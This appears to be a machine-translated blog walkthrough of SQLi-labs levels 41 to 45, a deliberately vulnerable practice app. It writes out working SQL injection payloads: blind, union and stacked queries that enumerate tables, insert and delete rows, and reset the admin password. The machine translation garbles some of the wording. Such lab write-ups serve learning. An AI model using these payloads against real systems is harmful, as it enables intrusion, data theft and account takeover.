当前位置:网站首页>SQL Lab (41~45) (continuous update later)
SQL Lab (41~45) (continuous update later)
2022-07-07 12:24:00 【hcjtn】
(41~45)
sql-lab-41
And 40 It's the same , Using stack injection , Time blind note , We found that it was just the different way of wrapping
Resolve table name :?id=1’ and if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :?id=1’ and if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
therefore , We try to insert a statement :
?id=1;insert into users(id,username,password)values(20,‘hcjtn’,‘1234’)-- q
We can also try to modify the statement we just inserted :
?id=1 ;update users set username=‘tn’ where id=20-- q
Then try to eliminate it :
?id=1;delete from users where id=20 – q
sql-lab-42
open 42 Turn off , We found that it is very similar to the previous secondary injection interface
![[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-S0IIcnbM-1642853545248)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220122180348940.png)]](/img/f6/48da0a43fb7efe9f85e7b7bac5b946.jpg)
At that time, we were new users , Use secondary injection to carry out a sql The ginseng , But this level does not allow us to create new users ,
![[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-CSotAlDy-1642853545249)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220122180525832.png)]](/img/71/e31498d0f823d51cc583b527bf64c1.jpg)
So we need to find its injection point above : When we're in password On the input ’or 1=1 – q
![[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-cVl9CUnn-1642853545249)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220122181132852.png)]](/img/dd/c34e05c9321f08976da700aa8f6a7c.jpg)
It is found that its injection point is password On
therefore , We can inject changes with stack admin password
First step : Determine its table name and Name
Name of judgment table :
’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ #
Found to have emails,referers,uagents,users Three tables
![[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-1Rw5bF9q-1642853545250)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220122181712329.png)]](/img/85/95c9b1213bdd5bfd63c63220e2abab.jpg)
Judge the listing :
’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=‘users’-- q
Find out users There are id,username,password Three column names
![[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-JbtOUBYO-1642853545250)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220122181839109.png)]](/img/f8/15d2d46b674db745e814cb709d80fe.jpg)
Then we use stack injection to change the administrator password :
’ ;update users set password=‘hcjtn’ where username=‘admin’#-- q
Then input admin And password hcjtn I found that the landing was successful
![[ Failed to transfer the external chain picture , The origin station may have anti-theft chain mechanism , It is suggested to save the pictures and upload them directly (img-tIaT2t1w-1642853545250)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220122182233755.png)]](/img/32/af47e73e5b98fc2b071782a71b2196.jpg)
sq-lab-43
and sql-lab-42 The same first segment injection point , stay password On the input ’)or 1=1# I found that the landing was successful It is found that the injection point is password On
43 Guan he 42 The difference of closing is only the difference of closing mode
The rest are exactly the same
The first is to judge the table name and column name :
Name of judgment table :
') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ #
Judge the listing :
') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘security’ and table_name=‘users’#
Use stack injection to change the administrator password :
1’);update users set password=‘hcjtn’ where username=‘admin’#
sql-lab-44
It's the same interface again ,
First judge the injection point when we are password On the input ’or 1=1 – q, I found that the landing was successful
Injection point :password
This level and 42 The difference is : There is no obvious visual sign of error reporting in this level
So we can only use Boolean blind note :
Resolve library name :
'or (ascii(substr((database()),1,1)))=115#
Description the first digit of the database name is s
'or (ascii(substr((database()),2,1)))=101#
Description the first digit of the database name is e
Name of judgment table :
'or (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q
Found to have emails,referers,uagents,users Three tables
Judge the listing :
'and (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q
Find out users There are id,username,password Three column names
And then change admin Password :
';update set password=‘hcjtn’ where username=‘admin’#
Click , boring
sql-lab-45
The injection point is possword On :’)or 1=1 #
Use time blind injection
Resolve database name :’)or if((ascii(substr(database(),1,1))=115),sleep(5),1)-- q The first is s
Resolve table name : ')or if((ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1))=101),sleep(5),1)-- q The first is e
Resolve field name :’ )or if((ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1))=105),sleep(5),1)-- q The first is i
get data : ')or (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q The first is i
边栏推荐
- Present pod information to the container through environment variables
- Idea 2021 Chinese garbled code
- VSCode的学习使用
- Tutorial on the principle and application of database system (011) -- relational database
- Xiaohongshu microservice framework and governance and other cloud native business architecture evolution cases
- DOM parsing XML error: content is not allowed in Prolog
- Baidu digital person Du Xiaoxiao responded to netizens' shouts online to meet the Shanghai college entrance examination English composition
- 解密GD32 MCU产品家族,开发板该怎么选?
- Unity中SmoothStep介绍和应用: 溶解特效优化
- Introduction and application of smoothstep in unity: optimization of dissolution effect
猜你喜欢
Sonar:Cognitive Complexity认知复杂度
![[extraction des caractéristiques de texture] extraction des caractéristiques de texture de l'image LBP basée sur le mode binaire local de Matlab [y compris le code source de Matlab 1931]](/img/65/bf1d0f82878a49041e8c2b3a84bc15.png)
[extraction des caractéristiques de texture] extraction des caractéristiques de texture de l'image LBP basée sur le mode binaire local de Matlab [y compris le code source de Matlab 1931]
Completion report of communication software development and Application
Learning and using vscode
消息队列消息丢失和消息重复发送的处理策略
Tutorial on principles and applications of database system (007) -- related concepts of database
Detailed explanation of debezium architecture of debezium synchronization
超标量处理器设计 姚永斌 第10章 指令提交 摘录
![[filter tracking] strapdown inertial navigation simulation based on MATLAB [including Matlab source code 1935]](/img/ae/52cdc98fb9db8c0d0776b8274ecd39.png)
[filter tracking] strapdown inertial navigation simulation based on MATLAB [including Matlab source code 1935]
NPC Jincang was invited to participate in the "aerospace 706" I have an appointment with aerospace computer "national Partner Conference
随机推荐
盘点JS判断空对象的几大方法
Summed up 200 Classic machine learning interview questions (with reference answers)
跨域问题解决方案
111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
Fleet tutorial 14 basic introduction to listtile (tutorial includes source code)
Unity 贴图自动匹配材质工具 贴图自动添加到材质球工具 材质球匹配贴图工具 Substance Painter制作的贴图自动匹配材质球工具
Niuke website
[shortest circuit] acwing1128 Messenger: Floyd shortest circuit
Several methods of checking JS to judge empty objects
Sonar:cognitive complexity
开发一个小程序商城需要多少钱?
Epp+dis learning road (2) -- blink! twinkle!
Flet教程之 18 Divider 分隔符组件 基础入门(教程含源码)
ES底层原理之倒排索引
Up meta - Web3.0 world innovative meta universe financial agreement
[data clustering] realize data clustering analysis based on multiverse optimization DBSCAN with matlab code
Superscalar processor design yaoyongbin Chapter 9 instruction execution excerpt
5V串口接3.3V单片机串口怎么搞?
wallys/Qualcomm IPQ8072A networking SBC supports dual 10GbE, WiFi 6
消息队列消息丢失和消息重复发送的处理策略